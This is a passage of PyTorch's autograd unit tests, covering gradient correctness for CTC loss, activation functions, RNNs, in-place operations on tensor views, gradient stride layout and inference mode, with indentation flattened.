@skipCUDAIfCudnnVersionLessThan(7600)
def test_ctc_loss_cudnn(self, device):
batch_size = 16
input_length = 30
num_labels = 101
target_length = 15
targets = torch.randint(1, num_labels, (batch_size * target_length,),
device='cuda', dtype=torch.long)
log_probs = torch.log_softmax(torch.randn(input_length, batch_size, num_labels, device='cuda', dtype=torch.float), 2)
log_probs.requires_grad_()
input_lengths = batch_size * [input_length]
target_lengths = batch_size * [target_length]
grad_out = torch.randn(batch_size, device='cuda', dtype=torch.float)
with torch.backends.cudnn.flags(enabled=False):
loss_native = torch.nn.functional.ctc_loss(log_probs, targets, input_lengths, target_lengths, reduction='none')
grad_native, = torch.autograd.grad(loss_native, log_probs, grad_out)
loss_cudnn = torch.nn.functional.ctc_loss(log_probs, targets.to('cpu', torch.int32),
input_lengths, target_lengths, reduction='none')
self.assertTrue("Cudnn" in str(loss_cudnn.grad_fn))
grad_cudnn, = torch.autograd.grad(loss_cudnn, log_probs, grad_out)
self.assertEqual(grad_cudnn, grad_native, atol=1e-4, rtol=0)
def test_leaky_relu_inplace_with_neg_slope(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), -2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.rrelu_(a.clone(), -5.0, 1.0)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
def test_leaky_relu_inplace_with_zero_slope(self, device):
a = torch.tensor([-2., 0., 2.], device=device, requires_grad=True)
b = torch.nn.functional.leaky_relu_(a.clone(), 0.0)
b.backward(torch.ones(3, device=device))
expected = torch.tensor([0., 0., 1.], device=device)
self.assertEqual(a.grad, expected)
a_bf16 = torch.tensor([-2., 0., 2.], device=device, dtype=torch.bfloat16, requires_grad=True)
b_bf16 = torch.nn.functional.leaky_relu_(a_bf16.clone(), 0.0)
b_bf16.backward(torch.ones(3, device=device))
expected_bf16 = torch.tensor([0., 0., 1.], device=device, dtype=torch.bfloat16)
self.assertEqual(a_bf16.grad, expected_bf16)
@onlyOnCPUAndCUDA
def test_elu_inplace_with_neg_alpha(self, device):
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.elu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
a = torch.tensor([-1., 1.], device=device, requires_grad=True)
b = torch.nn.functional.celu_(a.clone(), alpha=-2)
with self.assertRaisesRegex(RuntimeError, "call out-of-place version"):
b.backward(torch.ones(2, device=device))
@onlyCUDA
def test_free_unneeded_tensor(self, device):
x = torch.randn(2, 3, 10, 10, device=device, requires_grad=True)
m = torch.randn(1, 3, 1, 1, device=device)
z = x.sum()
base_mem = torch.cuda.memory_allocated()
z = ((x + 2) * m).sum()
end_mem = torch.cuda.memory_allocated()
        # In the end the memory usage should remain equal, because neither
        # (x + 2) nor ((x + 2) * m) should be kept alive for backward, while the
# previous allocation of z had the same size as the current one.
self.assertEqual(base_mem, end_mem)
@onlyCUDA
def test_pin_memory(self, device):
x = torch.randn(2, 2, dtype=torch.double, requires_grad=True)
self.assertEqual(x, x.pin_memory())
self.assertIsNot(x, x.pin_memory())
self.assertTrue(x.pin_memory().requires_grad)
gradcheck(lambda x: x.pin_memory(), [x])
gradgradcheck(lambda x: x.pin_memory(), [x])
@skipCUDAIfRocm
@onlyCUDA
def test_profiler_emit_nvtx(self, device):
# This test is not intended to ensure correctness of nvtx ranges.
# That would require something a great deal more complex (you'd have to create a
# profile in a subprocess, open it, and parse the sql somehow).
# This test is merely intended to catch if emit_nvtx breaks on construction.
a = torch.tensor([1, 2, 3], dtype=torch.float32, device=device)
with torch.cuda.profiler.profile():
with emit_nvtx():
a.add(1.0)
@onlyCUDA
def test_rnn_backward_to_input_but_not_parameters(self, device):
# this checks whether it is possible to not require
# weight parameters, but require inputs, see #7722
l = torch.nn.LSTM(2, 3).to(device)
for p in l.parameters():
p.requires_grad = False
s = torch.randn(1, 1, 2, requires_grad=True, device=device)
out, _ = l(s)
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
@onlyCUDA
def test_lstmcell_backward_only_one_output_grad(self, device):
        # checks that undefined gradients don't hamper the backward
# see #11872
l = torch.nn.LSTMCell(2, 3).to(device).double()
s = torch.randn(1, 2, device=device, dtype=torch.double, requires_grad=True)
for i in range(2):
out = l(s)[i]
out.sum().backward()
self.assertFalse(s.grad is None or s.grad.abs().sum().item() == 0)
def _test_rnn_mod(self, mod, inp):
def flatten_out(mod, inp):
out = mod(inp)
return tuple([t if isinstance(t, torch.Tensor) else tt for t in out for tt in t])
gradcheckfunc = partial(flatten_out, mod)
with torch.backends.cudnn.flags(enabled=False):
gradcheck(gradcheckfunc, inp, check_batched_grad=False)
gradgradcheck(gradcheckfunc, inp, check_batched_grad=False)
if inp.is_cuda and not TEST_WITH_ROCM:
# Assert that we have good error message around unsupported CuDNN double backward
# NB: we trigger double backward using .backward() instead of autograd.grad due to
# https://github.com/pytorch/pytorch/issues/37874
with torch.backends.cudnn.flags(enabled=True):
result = gradcheckfunc(inp)
result[0].sum().backward(create_graph=True)
grad0 = next(mod.parameters()).grad
with self.assertRaisesRegex(RuntimeError,
"please disable the CuDNN backend temporarily"):
grad0.sum().backward()
# Here we avoid the backward(create_graph=True) memory leak
# described in https://github.com/pytorch/pytorch/issues/7343
for param in mod.parameters():
param.grad = None
inp.grad = None
@skipMeta # LSTM cell reuses output which was resized
def test_LSTM_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.LSTM(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
@skipMeta # GRU cell reuses output which was resized
def test_GRU_grad_and_gradgrad(self, device):
hsize = 4
inp = torch.rand(1, 3, hsize, device=device, dtype=torch.float64, requires_grad=True)
for bias in [True, False]:
mod = torch.nn.GRU(hsize, hsize, bias=bias).to(device).to(torch.float64)
self._test_rnn_mod(mod, inp)
def test_copysign_subgradient(self, device):
# Input is 0.0
x = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Input is -0.0
x = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [0.0, 0.0, 0.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is 0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([0.0, 0.0, 0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [-1.0, 0.0, 1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
# Other is -0.0
x = torch.tensor([-1.0, 0.0, 1.0], dtype=torch.float, device=device, requires_grad=True)
y = torch.tensor([-0.0, -0.0, -0.0], dtype=torch.float, device=device, requires_grad=True)
out = torch.copysign(x, y)
out.sum().backward()
self.assertEqual(x.grad.tolist(), [1.0, 0.0, -1.0])
self.assertEqual(y.grad.tolist(), [0.0] * 3)
@deviceCountAtLeast(1)
def test_grad_assignment(self, devices):
x = torch.randn(5, 5, device=devices[0])
# Tests that the wrong shape raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(2, 2, device=devices[0])
# Tests that the wrong dtype raises
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, dtype=torch.long, device=devices[0])
# Tests that self-assignment raises
with self.assertRaises(RuntimeError):
x.grad = x
# Tests device -> cpu grad assignment raises
if self.device_type != 'cpu':
with self.assertRaises(RuntimeError):
t_cpu = torch.rand(5, 5)
t_cpu.grad = torch.randn(5, 5, device=devices[0])
# Tests half type on CUDA
if self.device_type == 'cuda':
x = x.to(dtype=torch.half, device=devices[0])
x.grad = torch.zeros_like(x)
# Tests cross-device assignment raises
if len(devices) > 1:
x = torch.randn(5, 5, device=devices[0])
with self.assertRaises(RuntimeError):
x.grad = torch.randn(5, 5, device=devices[1])
@deviceCountAtLeast(1)
@dtypes(torch.float, torch.double)
def test_requires_grad_factory(self, devices, dtype):
fns = [torch.ones_like, torch.randn_like]
x = torch.randn(2, 3, dtype=dtype, device=devices[0])
for fn in fns:
for requires_grad in [True, False]:
output = fn(x, dtype=dtype, device=devices[0], requires_grad=requires_grad)
self.assertEqual(requires_grad, output.requires_grad)
self.assertIs(dtype, output.dtype)
self.assertEqual(devices[0], str(x.device))
@deviceCountAtLeast(2)
def test_unused_output_device(self, devices):
from torch.nn.parallel._functions import Broadcast
x = torch.randn(5, 5, dtype=torch.float, device=devices[0], requires_grad=True)
outputs = Broadcast.apply(list(range(len(devices))), x)
y = outputs[-1] * 2
y.sum().backward()
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(x.grad, torch.ones(5, 5) * 2)
@deviceCountAtLeast(2)
def test_backward_device(self, devices):
# check that current device matches the variable's device
device = [None]
class Identity(torch.autograd.Function):
@staticmethod
def forward(ctx, x):
return x.clone()
@staticmethod
def backward(ctx, grad_output):
device[0] = grad_output.device
return grad_output.clone()
v = torch.randn(1, device=devices[1], requires_grad=True)
Identity.apply(v).backward()
self.assertEqual(str(device[0]), devices[1])
@deviceCountAtLeast(2)
def test_inputbuffer_add_multidevice(self, devices):
input = torch.randn(1, device=devices[0], requires_grad=True)
output = input.to(device=devices[1]) + input.to(device=devices[1])
output.backward()
@onlyCPU
def test_copy_(self, device):
# At the time of writing this test, copy_ is not generated from native_functions.yaml
# there was a bug that bfloat16 was not recognized as floating.
x = torch.randn(10, device=device, requires_grad=True)
floating_dt = [dt for dt in get_all_dtypes() if dt.is_floating_point]
for dt in floating_dt:
y = torch.empty(10, device=device, dtype=dt)
y.copy_(x)
self.assertTrue(y.requires_grad)
z = x.to(torch.bfloat16)
self.assertTrue(z.requires_grad)
@onlyCUDA
def test_simple_reentrant_cross_device(self, device):
class ReentrantFunc(Function):
_cpu_mode = True
@staticmethod
def forward(ctx, x):
return x * (x + 2)
@staticmethod
def backward(ctx, grad_output):
with torch.enable_grad():
if ReentrantFunc._cpu_mode:
new_param = torch.randn(2, 2, requires_grad=True)
(new_param ** 2).sum().backward()
else:
new_param = torch.randn(2, 2, device=device, requires_grad=True)
(new_param ** 2).sum().backward()
return grad_output
        # Reentrant starts on GPU thread, finishes on GPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
out = ReentrantFunc.apply(x)
out.sum().backward()
        # Reentrant starts on CPU thread, finishes on GPU thread
x = torch.randn(2, 2, requires_grad=True)
# set ReentrantFunc node to GPU to emit tasks to GPU queue
ReentrantFunc._cpu_mode = False
out = ReentrantFunc.apply(x)
out.sum().backward()
        # Reentrant starts on GPU thread, finishes on CPU thread
x = torch.randn(2, 2, device=device, requires_grad=True)
# set ReentrantFunc node to CPU to emit tasks to CPU queue
ReentrantFunc._cpu_mode = True
out = ReentrantFunc.apply(x)
out.sum().backward()
@onlyCUDA
def test_cross_device_reentrant_autograd(self, device):
# Output on gpu so that this task will be associated with the gpu thread
def fn_on_gpu(inp):
# Artificially increase the priority of the next op to make sure it runs
# as soon as we reach it before the ops of branch1.
dummy = inp * 2 * 2 * 2 * 2
return inp.to(device=device)
def parent_on_cpu(inp):
# Slow branch of ops on gpu so that the work queue for the gpu thread
# won't empty too quickly. They also have smaller priorities than the
# ones created by fn_on_gpu
branch1 = inp.to(device=device)
branch1 = branch1 / branch1
branch1 = branch1 / branch1
branch1 = branch1 / branch1
# Perform checkpoint on cpu tensors. So the last op performed in the reentrant
# autograd is an AccumulateGrad that runs on the cpu thread for the gpu thread.
# So the cpu thread will notify the gpu thread with an empty NodeTask.
branch2 = checkpoint(fn_on_gpu, inp)
out = branch2 + branch1
return out
inp = torch.rand(2, requires_grad=True)
out = parent_on_cpu(inp)
# This will segfault if the empty NodeTask is not handled properly in the
# gpu thread ReadyQueue
out.sum().backward()
def test_inplace_on_view_backprop_base(self, device):
# modify view and back-prop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v1.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [1, 1]])
def test_inplace_on_view_backprop_view_of_view(self, device):
# modify view and backprop through view-of-view
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = x.narrow(0, 0, 1)
v1.mul_(2)
v2.sum().backward()
self.assertEqual(root.grad.tolist(), [[2, 2], [0, 0]])
def test_inplace_on_view_of_view(self, device):
# modify view-of-view and backprop through base
root = torch.randn(2, 2, device=device, requires_grad=True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1]])
def test_inplace_on_view_then_no_grad(self, device):
# Perform an in-place operation on a view of a non-leaf variable.
a = torch.ones(3, 1, dtype=torch.double, device=device, requires_grad=True)
b = a * 2
c = b.view_as(b)
c[0][0] = 3
# Force a graph update with grad disabled.
with torch.no_grad():
c.grad_fn
c.sum().backward()
def test_inplace_on_view_gradcheck(self, device):
# gradcheck modifications to views
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
x.narrow(1, 2, 2).narrow(0, 1, 2).mul_(b)
x.narrow(1, 0, 2).narrow(0, 1, 2).mul_(b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_multiple_outputs(self, device):
root = torch.arange(9., dtype=torch.double).reshape(3, 3).requires_grad_()
x = root.clone()
v1 = x.unbind()
with self.assertRaises(RuntimeError):
v1[0].mul_(2)
def test_inplace_on_view_of_multiple_output_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.unbind(0)
c = b[0].view_as(b[0])
with self.assertRaises(RuntimeError):
c.mul_(2)
def test_inplace_multiple_output_view_of_view(self, device):
a = torch.rand(10, dtype=torch.double, device=device, requires_grad=True).clone()
b = a.view_as(a)
c = b.unbind(0)
with self.assertRaises(RuntimeError):
c[0].mul_(2)
def test_inplace_on_view_makes_base_require_grad(self, device):
# in-place modification to view makes base require grad
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=False)
b = torch.randn(4, 2, dtype=torch.double, device=device, requires_grad=True)
def func(root, b):
x = root.clone()
self.assertFalse(x.requires_grad)
x.narrow(1, 2, 2).mul_(b)
self.assertTrue(x.requires_grad)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_backprop_view(self, device):
# modify view and backprop through view
a = torch.tensor([2., 5.], device=device, requires_grad=False)
b = torch.tensor([3.], device=device, requires_grad=True)
res = a.narrow(0, 1, 1).mul_(b)
res.sum().backward()
self.assertEqual(b.grad.tolist(), [5])
self.assertIsNone(a.grad)
def test_inplace_on_view_modify_base(self, device):
# Test that an in-place operation on a base that forced it to require
# grad also forces any previous views to require grad and backprop
# correctly
r = torch.ones(1, dtype=torch.double, device=device, requires_grad=True)
def fn(r):
x = torch.ones(5, dtype=torch.double, device=device)
v = x.select(0, 1)
self.assertFalse(v.requires_grad)
self.assertIsNone(v.grad_fn)
x.add_(r) # v is now dependent on r due to the in-place op on x
self.assertTrue(v.requires_grad)
return v
gradcheck(fn, [r])
gradgradcheck(fn, [r])
def test_inplace_on_view_python(self, device):
# in-place modifications of Python-autograd created view
a = torch.randn(4, 4, dtype=torch.double, device=device, requires_grad=True)
b = torch.randn(2, 2, dtype=torch.double, device=device, requires_grad=True)
class PyAdd(torch.autograd.Function):
@staticmethod
def forward(ctx, x, y):
ctx.mark_dirty(x)
x.add_(y)
return x
@staticmethod
def backward(ctx, grad):
return grad, grad
def func(root, b):
x = root.clone()
PyAdd.apply(x.narrow(1, 2, 2).narrow(0, 1, 2), b)
PyAdd.apply(x.narrow(1, 0, 2).narrow(0, 1, 2), b)
return x
gradcheck(func, [a, b], raise_exception=True)
go = torch.randn(a.size(), dtype=torch.double, device=device, requires_grad=True)
gradgradcheck(func, (a, b), (go,))
def test_inplace_on_view_non_contig(self, device):
root = torch.ones(2, 3, 2, device=device).select(2, 1).t().requires_grad_(True)
x = root.clone()
v1 = x.narrow(0, 0, 1)
v2 = v1.narrow(1, 1, 1)
v2.mul_(2)
x.sum().backward()
self.assertEqual(root.grad.tolist(), [[1, 2], [1, 1], [1, 1]])
def test_inplace_on_view_multi_output_unsafe(self, device):
for f in [lambda t: t.unsafe_split(1),
lambda t: t.unsafe_split_with_sizes((1, 1, 1)),
lambda t: t.unsafe_chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
s1.mul_(s2)
s1.sum().backward()
def test_inplace_on_view_multi_output_safe(self, device):
for f in [lambda t: t.split(1),
lambda t: t.split_with_sizes((1, 1, 1)),
lambda t: t.chunk(3)]:
a = torch.randn(3, 3, device=device, requires_grad=True)
b = a + a
s1, s2, s3 = f(b)
error_msg = 'This view is the output of a function that returns multiple views.'
with self.assertRaisesRegex(RuntimeError, error_msg):
s1.mul_(s2)
def test_mv_grad_stride_0(self, device):
# Reference: https://github.com/pytorch/pytorch/issues/38315
mat = torch.randn(2, 2, dtype=torch.double, device=device)
vec = torch.randn(1, dtype=torch.double, device=device).requires_grad_(True)
def fn(vec):
# Expand inside the function to make sure the input to
# gradcheck does not have overlapping memory
vec = vec.expand(2)
return (mat @ vec).sum()
gradcheck(fn, (vec))
gradgradcheck(fn, (vec))
@onlyCUDA
def test_gradcheck_input_output_different_device(self, device):
x = torch.ones((1,), dtype=torch.double, device="cuda", requires_grad=True)
gradcheck(lambda x: x.to("cpu"), (x,))
x = torch.ones((1,), dtype=torch.double, device="cpu", requires_grad=True)
gradcheck(lambda x: x.to("cuda"), (x,))
# TODO: see if this can be OpInfo'd or moved to test_reductions.py
def test_logcumsumexp_large_value(self, device):
a = torch.rand(4, 4, 4, dtype=torch.double, requires_grad=True)
with torch.no_grad():
# Large Number
a[0] = 10000
gradcheck(lambda x: x.logcumsumexp(0), a)
gradgradcheck(lambda x: x.logcumsumexp(0), a)
gradcheck(lambda x: x.logcumsumexp(1), a)
gradgradcheck(lambda x: x.logcumsumexp(1), a)
gradcheck(lambda x: x.logcumsumexp(2), a)
gradgradcheck(lambda x: x.logcumsumexp(2), a)
def test_strided_leaf_grad_layout(self, device):
# (1) If leaf is non-overlapping and dense, grad's layout should match its leaf.
for fmt_a in (torch.contiguous_format, torch.channels_last):
for fmt_b in (torch.contiguous_format, torch.channels_last):
a = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_a)
b = torch.rand((2, 3, 4, 5), device=device).to(memory_format=fmt_b)
a.requires_grad_()
b.requires_grad_()
# checks (1) for broadcasted gradients
a.sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
b.sum().backward()
self.assertEqual(b.grad.stride(), b.stride())
# checks (1) for non-broadcasted gradients
a.grad = None
b.grad = None
(a * b).sum().backward()
self.assertEqual(a.grad.stride(), a.stride())
self.assertEqual(b.grad.stride(), b.stride())
        # (2) If leaf isn't dense, checks that grads are row-major contiguous.
c = torch.empty_strided((2, 2), (4, 2), device=device).copy_(torch.rand((2, 2), device=device))
c.requires_grad_()
d = torch.rand((2, 2), device=device)
# checks (2) for broadcasted gradients
c.sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# checks (2) for non-broadcasted gradients
c.grad = None
(c * d).sum().backward()
self.assertEqual(c.grad.stride(), (2, 1))
# TODO: OpInfo this or move to atleast's test suite
def _test_atleast(self, device, torch_fn):
# 0-dim
s = torch.tensor(0.5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), s)
gradgradcheck(lambda x: torch_fn(x), s)
# 1-dim
a = torch.rand(4, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: torch_fn(x), a)
gradgradcheck(lambda x: torch_fn(x), a)
# 2,3,4-dim
b = torch.rand(4, 3, dtype=torch.double, requires_grad=True)
c = torch.rand(4, 3, 2, dtype=torch.double, requires_grad=True)
d = torch.rand(4, 3, 2, 1, dtype=torch.double, requires_grad=True)
input_tuple = (s, a, b, c, d)
gradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
gradgradcheck(lambda s, w, x, y, z: torch_fn(s, w, x, y, z), input_tuple)
def test_atleast(self, device):
self._test_atleast(device, torch.atleast_1d)
self._test_atleast(device, torch.atleast_2d)
self._test_atleast(device, torch.atleast_3d)
# TODO: opinfo this or move to test_binary_ufuncs.py
def test_xlogy(self, device):
def _tensor_tensor_helper(x, y):
gradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
gradgradcheck(lambda x, y: torch.xlogy(x, y), (x, y))
with torch.no_grad():
x = x.clone()
x[torch.rand_like(x) > 0.5] = 0
gradcheck(lambda y: torch.xlogy(x, y), (y))
gradgradcheck(lambda y: torch.xlogy(x, y), (y))
shapes = ((4,), (1, 4), (1, 1, 4), (1, 1, 1, 4))
        # For broadcastable shapes and scalars.
for x_shape, y_shape in permutations(shapes, 2):
x = torch.rand(*x_shape, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(*y_shape, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
gradcheck(lambda y: torch.xlogy(0, y), (y))
gradgradcheck(lambda y: torch.xlogy(0, y), (y))
gradcheck(lambda y: torch.xlogy(2, y), (y))
gradgradcheck(lambda y: torch.xlogy(2, y), (y))
gradcheck(lambda y: torch.xlogy(y, 2), (y))
gradgradcheck(lambda y: torch.xlogy(y, 2), (y))
# Different shape
x = torch.rand(2, 3, 4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
# Same shape
x = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
y = torch.rand(4, 5, dtype=torch.double, device=device, requires_grad=True)
_tensor_tensor_helper(x, y)
_tensor_tensor_helper(y, x)
_tensor_tensor_helper(x, x)
_tensor_tensor_helper(y, y)
def test_copy_r_to_c(self, device):
out_c = torch.empty(3, 2, dtype=torch.cdouble, device=device)
inp_r = torch.randn(3, 2, dtype=torch.double, device=device,
requires_grad=True)
def do_test():
out_c.copy_(inp_r)
out_c.sum().backward()
self.assertEqual(inp_r.grad, torch.ones_like(inp_r))
self.assertNotWarn(do_test)
def test_non_differentiable_ops(self, device):
# Just make sure the op doesn't raise an error
# and resulting tensor has requires_grad=False.
x = torch.tensor([[1, 2], [3, 4.]], requires_grad=True, device=device)
out = torch.isin(x, torch.tensor([2, 3], device=device))
self.assertFalse(out.requires_grad)
x = torch.randn(3, 3, requires_grad=True)
out = torch.signbit(x)
self.assertFalse(out.requires_grad)
class TestAutogradInferenceMode(TestCase):
def _is_inference_tensor(self, tensor):
try:
err_msg = "Inference tensors do not track version counter"
with self.assertRaisesRegex(RuntimeError, err_msg):
tensor._version
return True
except AssertionError as e:
return False
def test_inference_mode_context_manager(self):
self.assertFalse(torch.is_inference_mode_enabled())
with torch.inference_mode():
self.assertTrue(torch.is_inference_mode_enabled())
with torch.inference_mode(False):
self.assertFalse(torch.is_inference_mode_enabled())
self.assertTrue(torch.is_inference_mode_enabled())
self.assertFalse(torch.is_inference_mode_enabled())
def test_inference_mode_decorator(self):
@torch.inference_mode()
def func(x):
self.assertTrue(torch.is_inference_mode_enabled())
return x * x
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
d = func(c)
self.assertTrue(torch.is_inference(d))
self.assertFalse(d.requires_grad)
def test_inference_mode_tensor_creation(self):
with torch.inference_mode():
# new tensors created through constructors are inference tensors
c = torch.ones(1, 2, 3)
self.assertFalse(c.requires_grad)
self.assertTrue(torch.is_inference(c))
# requires_grad doesn't change inference tensor behavior in InferenceMode
tmp = torch.ones(1, 2, 3, requires_grad=True)
self.assertTrue(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
tmp = torch.ones(1, 2, 3).requires_grad_(False)
self.assertFalse(tmp.requires_grad)
self.assertTrue(torch.is_inference(tmp))
def test_inference_mode_existing_autograd_session(self):
s = torch.ones(1, 2, 3, requires_grad=True)
a = s.clone()
# `a` gets saved outside of inference mode
out = a * a
with torch.inference_mode():
a.add_(2)
self.assertFalse(torch.is_inference(a))
# tensors created outside of inference mode aren't
# inference tensors, so they will still have their
# version counters tracked
err_msg = ("one of the variables needed for gradient computation has been "
"modified by an inplace operation")
with self.assertRaisesRegex(RuntimeError, err_msg):
out.backward(torch.ones_like(out))
def test_inference_mode_inf_tensor_in_inf_mode_functional_op(self):
def functional_op(x):
return x * x
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
                # performing a non-view operation produces an inference tensor
# that does not require grad
func_out = functional_op(c)
self.assertTrue(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
def test_inference_mode_inf_tensor_in_inf_mode_inplace_op(self):
@torch.inference_mode()
def run_test(fn):
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
# after performing inplace operation, tensor is still
# an inference tensor
fn(c)
self.assertTrue(torch.is_inference(c))
self.assertEqual(c.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_inf_mode_view_op(self):
with torch.inference_mode():
for requires_grad in (True, False):
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
                # performing a view operation produces an inference tensor
                # that does not require grad
view_out = c.view(-1)
self.assertTrue(torch.is_inference(view_out))
self.assertFalse(view_out.requires_grad)
def test_inference_mode_inf_tensor_in_normal_mode_functional_op(self):
def functional_op(x):
return x * x
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
func_out = functional_op(c)
self.assertFalse(torch.is_inference(func_out))
self.assertFalse(func_out.requires_grad)
self.assertTrue(func_out.is_leaf)
def test_inference_mode_inf_tensor_in_normal_mode_inplace_op(self):
def run_test(fn):
for requires_grad in (False, True):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
if requires_grad:
# leaf variable that requires grad is being used in an inplace
# operation when requires_grad=True
pass
else:
err_msg = "Inplace update to inference tensor outside InferenceMode"
with self.assertRaisesRegex(RuntimeError, err_msg):
fn(c)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_inference_mode_inf_tensor_in_normal_mode_view_op(self):
for requires_grad in (True, False):
with torch.inference_mode():
c = torch.ones(1, 2, 3, requires_grad=requires_grad)
out = c.view(-1)
self.assertTrue(torch.is_inference(out))
self.assertFalse(out.requires_grad)
self.assertFalse(out._is_view())
self.assertTrue(out.is_leaf)
def test_normal_tensor_inplace_output_in_inference_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_inplace_output_in_normal_mode(self):
def run_test(fn):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace
fn(a)
self.assertFalse(torch.is_inference(a))
self.assertEqual(a.requires_grad, requires_grad)
# inplace -> inplace -> view
view_out = a.view(-1)
self.assertFalse(torch.is_inference(view_out))
self.assertEqual(view_out.requires_grad, requires_grad)
run_test(lambda x: x.add_(2))
run_test(lambda x: x.transpose_(0, 1))
def test_normal_tensor_view_output_in_inference_mode(self):
for requires_grad in (True, False):
s = torch.ones(1, 2, 3, requires_grad=requires_grad)
a = s.clone()
with torch.inference_mode():
out = a.view(-1)
self.assertFalse(torch.is_inference(out))
self.assertEqual(out.requires_grad, requires_grad)
self.assertTrue(out._is_view())
# view -> view
tmp = out.view(-1)
self.assertFalse(torch.is_inference(tmp))
self.assertEqual(tmp.requires_grad, requires_grad)
self.assertTrue(tmp._is_view())
self.assertTrue(tmp.is_leaf)
# view -> view -> inplace
self.assertTrue(torch.is_inference_mode_enabled())
